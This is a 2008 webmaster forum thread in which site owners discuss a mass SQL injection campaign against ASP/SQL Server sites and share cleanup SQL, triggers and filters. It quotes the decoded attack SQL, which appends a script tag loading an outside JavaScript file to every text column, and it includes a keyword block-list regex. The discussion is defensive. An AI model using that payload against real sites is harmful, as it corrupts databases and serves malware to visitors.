
Sql Injection virus problem.

Virus, Sql Injection.



10:02 am on May 23, 2008 (gmt 0)

5+ Year Member

Hi Friends, we have a website and we have constantly been attacked by a virus. A malicious script enters the SQL Server database and stops the site.
Can anyone please suggest how we can prevent it? I changed some script but that did not help either. I think it is coming in through our search field. <script>......</script> with a website name inside gets entered into every field of the SQL database. Please help!

Umar Rahman



7:41 pm on May 31, 2008 (gmt 0)

10+ Year Member

For those who have the same issue as myself, here is what I did, if that can help anyone

First I used the Narayana Vyas Kondreddi method posted above, and then for the remaining ntext data type I went through all the tables with that kind of field and did it one by one using the following statement:

Update <dbTable>
set <tbField> = replace(cast(<tbField> as nvarchar(4000)), '<spamstr>', '')


6:40 pm on Jun 3, 2008 (gmt 0)

5+ Year Member

Just got hit. To prevent further attacks I'm implementing some code in an include that checks the full querystring for the presence of SQL commands such as "select", "update", etc... characters that should not be present... I'm using regular expressions but simple instr() functions would work also. The key is to do these checks before any SQL commands are issued from your scripts, and if triggered to redirect the user to a simple 404 error page.


7:57 am on Jun 7, 2008 (gmt 0)

5+ Year Member


I have converted all SQL to stored procedures. As of now, there are no SQL commands in my C# code-behind! Still, my database gets infected by the virus. (NOTE: I have the connection string stored in my Web.config.)
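Added example (not code from this thread): moving a query into a stored procedure does not stop injection if the procedure itself still builds SQL text by concatenation. The table dbo.Products, its ProductName column and the three procedure names are hypothetical.

```sql
-- Added example; dbo.Products, ProductName and the procedure names are hypothetical.

-- Still injectable: @term is pasted into the SQL text, so a quote in @term
-- ends the string literal and whatever follows is executed as SQL.
CREATE PROCEDURE dbo.SearchProducts_Concat
    @term nvarchar(100)
AS
BEGIN
    SET NOCOUNT ON;
    DECLARE @sql nvarchar(4000);
    SET @sql = N'SELECT ProductName FROM dbo.Products WHERE ProductName LIKE ''%'
             + @term + N'%''';
    EXEC (@sql);
END
GO

-- Hardened: no dynamic SQL, so @term can only ever be compared as data.
CREATE PROCEDURE dbo.SearchProducts_Static
    @term nvarchar(100)
AS
BEGIN
    SET NOCOUNT ON;
    SELECT ProductName
    FROM dbo.Products
    WHERE ProductName LIKE N'%' + @term + N'%';
END
GO

-- Hardened where dynamic SQL cannot be avoided: the SQL text is constant and
-- the value travels separately as a typed parameter of sp_executesql.
CREATE PROCEDURE dbo.SearchProducts_Param
    @term nvarchar(100)
AS
BEGIN
    SET NOCOUNT ON;
    DECLARE @sql nvarchar(4000);
    SET @sql = N'SELECT ProductName FROM dbo.Products '
             + N'WHERE ProductName LIKE N''%'' + @t + N''%''';
    EXEC sp_executesql @sql, N'@t nvarchar(100)', @t = @term;
END
GO
```

The calling page has to pass the value as a typed command parameter as well; building the text of the EXEC call by concatenating user input reintroduces the same flaw one layer up.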


8:00 am on Jun 7, 2008 (gmt 0)

5+ Year Member

I would suggest all of you write a TRIGGER on the UPDATE event of the table, check for the presence of a script tag in the NEW VALUES, and roll back.


6:50 am on Jun 9, 2008 (gmt 0)

5+ Year Member


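-- =============================================
-- Description:<Description,,>
-- =============================================
CREATE TRIGGER [DBO].[trg_BusMaster_NoScript] -- trigger name is not shown in the post; placeholder
ON [DBO].[BusMaster]
AFTER INSERT, UPDATE -- events assumed; the post does not show this line
AS
BEGIN
DECLARE @Bus varchar(150)
-- SET NOCOUNT ON added to prevent extra result sets from
-- interfering with SELECT statements.
SET NOCOUNT ON;

if exists (select * from inserted)
BEGIN
-- note: this reads BusName from a single row of inserted
select @Bus=BusName from inserted
if @bus like '%<script%' or @bus like '%script>%'
-- Insert statements for trigger here
ROLLBACK TRANSACTION -- action assumed from the suggestion above; not shown in the post
END
END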



5:00 pm on Jun 12, 2008 (gmt 0)

5+ Year Member

I've picked apart how the attack inserts its data.

On a page that is seen to use querystrings, it adds the following to the end of whatever the valid params are (I've split the line for clarity).


This then runs the following SQL (I've mangled the script tag and URL).

DECLARE Table_Cursor
CURSOR FOR SELECT a.name,b.name
FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u'
AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<scpt src=http://www.thesite.com/b.js></scpt>''')
CLOSE Table_Cursor
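Added example (not part of the original post): a read-only T-SQL check that walks the same column types the cursor above selects (text, ntext, varchar, nvarchar) and reports which columns hold rows containing a script tag, so cleanup can be scoped. The search pattern and the #Findings temp table are assumptions of this example.

```sql
-- Added example. Read-only: it reports affected columns and changes no data.
-- The pattern is an assumption; adjust it to the string found in your own rows.
SET NOCOUNT ON;
DECLARE @pattern nvarchar(100);
SET @pattern = N'%<script%';

DECLARE @schema sysname, @table sysname, @column sysname;
DECLARE @sql nvarchar(4000), @hits int;

CREATE TABLE #Findings
    (SchemaName sysname, TableName sysname, ColumnName sysname, RowsHit int);

DECLARE col_cursor CURSOR LOCAL FAST_FORWARD FOR
    SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME
    FROM INFORMATION_SCHEMA.COLUMNS c
    JOIN INFORMATION_SCHEMA.TABLES t
      ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
    WHERE t.TABLE_TYPE = 'BASE TABLE'
      -- same types as xtype 35, 99, 167 and 231 in the injected cursor
      AND c.DATA_TYPE IN ('text', 'ntext', 'varchar', 'nvarchar');

OPEN col_cursor;
FETCH NEXT FROM col_cursor INTO @schema, @table, @column;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- QUOTENAME brackets each identifier; the pattern is passed as a parameter.
    SET @sql = N'SELECT @n = COUNT(*) FROM '
             + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
             + N' WHERE ' + QUOTENAME(@column) + N' LIKE @p';
    EXEC sp_executesql @sql, N'@p nvarchar(100), @n int OUTPUT',
         @p = @pattern, @n = @hits OUTPUT;

    IF @hits > 0
        INSERT INTO #Findings VALUES (@schema, @table, @column, @hits);

    FETCH NEXT FROM col_cursor INTO @schema, @table, @column;
END
CLOSE col_cursor;
DEALLOCATE col_cursor;

SELECT SchemaName, TableName, ColumnName, RowsHit
FROM #Findings
ORDER BY RowsHit DESC;
DROP TABLE #Findings;
```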



3:45 pm on Jun 13, 2008 (gmt 0)

5+ Year Member

I've cured it very simply by putting the following code at the top of every page. It's part of the generic header include stuff that gets pulled into every page.

(In ASP, don't know what the syntax would be in other web languages).

if len(Request.Servervariables("Query_String")) > 40 then
    response.write "Invalid page access"
    response.end ' stop the page dead, as described below
end if

40 - This is bigger than the querystring that any page on your website will post, adjust as necessary. Given that the injection is 1100 characters, the check could be a lot higher if needed.

Other options would be to redirect to a 404 page or other error, but redirects probably won't be honoured by the webbot so it's easiest to just stop the page dead.



4:08 pm on Aug 7, 2008 (gmt 0)

5+ Year Member

Hey guys,

My site was hit too. Really Nasty!

I got all that bad data out but I want to make sure this won't happen again.

My question is, in this code below, can I add this to my global.asa file to ensure all ASP pages are protected?

Will this work regardless of how the ASP page was constructed?

' this creates a global regexp object g_bl for testing strings against sql injection
dim g_bl, strURLRequest
set g_bl = New RegExp
g_bl.Pattern = "<IFRAME|<FRAME|<object|</object|'|xp_|;|--|/\*|<script|</script|ntext|nchar|varchar|nvarchar|alter|begin|create|cursor|declare|delete|drop|exec|execute|fetch|insert|kill|open|sys|sysobjects|syscolumns|table|update"
g_bl.IgnoreCase = true
g_bl.Multiline = true

If Request.ServerVariables("QUERY_STRING") <> "" Then
    strURLRequest = Request.ServerVariables("QUERY_STRING")
    If g_bl.test(strURLRequest) Then
        ' (the action taken on a match is not shown in the post)
    End If
End If

I feel like I'm missing something here. I really just need this to protect my site and data?


1:04 pm on Aug 9, 2008 (gmt 0)

WebmasterWorld Senior Member billys is a WebmasterWorld Top Contributor of All Time 10+ Year Member

We're patched against this type of attack, but I've got some bot trying to get in for nearly 24 hours now...


2:50 pm on Aug 10, 2008 (gmt 0)

5+ Year Member

A couple of days ago I also noticed this type of attack on one of my sites (same/very similar signature). No damage that I can see. I read through this and other linked threads, and it really sounds like "script kiddies" are trying to do this. After decoding the hex data, the attempt on my site is trying to run a javascript file coming from a cn domain as well, but it's different than some listed in other threads. Using SEs I searched for source payload using
and can see that the number of affected (and indexed) sites is rising by the day. Of course the payload file can be named anything but I was curious about this particular "strain" of file. For those of you wanting to play along at home search for w dot js in parenthesis.


12:34 am on Aug 16, 2008 (gmt 0)

WebmasterWorld Senior Member billys is a WebmasterWorld Top Contributor of All Time 10+ Year Member

The attack on my site wound up going on for around 36 hours. Waste of bandwidth.


3:06 am on Aug 16, 2008 (gmt 0)

5+ Year Member

There must be a list of URLs that "attackers" (script kiddies) are using. I am seeing hits only on one URI... Most of the attacks are coming from cn domains, although I am observing some originating from U.S. IPs as well (looks like cable and DSL lines (compromised machines maybe?)).


7:20 pm on Aug 16, 2008 (gmt 0)

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month

Stats of where the Declared SQL attacks are initiating from by Country ISO, generated from hits on one of my sites for the current month. It was interesting to see what the breakdown was. This was generated as I was trying to figure out what, if any, ranges were worth blocking altogether in general.

ISO Percent Hits
CN 37.54% 369
US 26.55% 261
TW 05.80% 57
HK 04.07% 40
KR 03.66% 36
CA 03.05% 30
BE 02.03% 20
IT 01.83% 18
AU 01.42% 14
VN 01.22% 12
MY 01.02% 10
MX 00.92% 9
CL 00.81% 8
NZ 00.81% 8
GB 00.71% 7
IL 00.61% 6
NL 00.61% 6
RU 00.61% 6
JP 00.51% 5
BG 00.41% 4
BS 00.41% 4
CO 00.41% 4
DE 00.41% 4
FR 00.41% 4
SG 00.41% 4
TH 00.41% 4
CS 00.31% 3
AR 00.20% 2
BR 00.20% 2
CH 00.20% 2
FI 00.20% 2
HU 00.20% 2
ID 00.20% 2
MU 00.20% 2
NO 00.20% 2
PE 00.20% 2
PH 00.20% 2
PL 00.20% 2
PT 00.20% 2
RO 00.20% 2
TR 00.20% 2
VE 00.20% 2


10:49 am on Aug 22, 2008 (gmt 0)

10+ Year Member

I've been getting hit with this over the past few days.

A few of the hits caused a child process of httpd to segfault!

I was not compromised. Mod Security failed the attempts.
To be sure, I searched the database for "http" and "iframe" entries - 0.
The server was also checked by a server security specialist and they couldn't figure out exactly why it segfaulted either. (Cannot replicate whatever the probes are doing, specifically)

I wouldn't have known this even happened if I hadn't been digging through /var/log/messages (no downtime or interruptions whatsoever associated with the segfaults)

(Server: Linux/Apache, MySQL and PHP are both up to date.. with grsec kernel)

Anyone else experiencing this? Does anyone know why it's causing the killing of a child process?


3:12 pm on Aug 26, 2008 (gmt 0)

10+ Year Member

They are now attacking my pages that are static but end in .asp

You would think that after several weeks they would move on. Has anyone identified anything that would make them finally realize that the site was protected? A response code, 404 etc...? Maybe redirect them to the IP that's being used?


3:35 pm on Aug 26, 2008 (gmt 0)

5+ Year Member

lol they're doing the same thing with my site, hitting well over 100 times a day, not stopping for anything, and yes, hitting static pages that end in .asp

Can we send them to a page delay that lasts a few minutes to annoy them a little?


11:03 am on Oct 15, 2008 (gmt 0)

5+ Year Member

Hi Friends,

I'm also having a similar problem with my website in ASP. My whole database is infected with the content ''><script src=".../new.htm"> .... </script> and all my data is corrupted. It's just an SQL injection but I can't find the solution. How does it happen? Please help me to solve this.


4:45 am on Oct 16, 2008 (gmt 0)

5+ Year Member

This seems to be an old topic, and related to ASP (which I'm not familiar with), but how about encoding HTML chars before insertion into the database. So if someone enters

<script blah ""></script>

Before inserting the input into the database, clean up and convert it to

&lt;script blah &quot;&quot;&gt;&lt;/script&gt;

Unless I'm missing something, after this the script won't get executed...
PHP has built-in functions for this (htmlspecialchars() or similar).. dunno about ASP
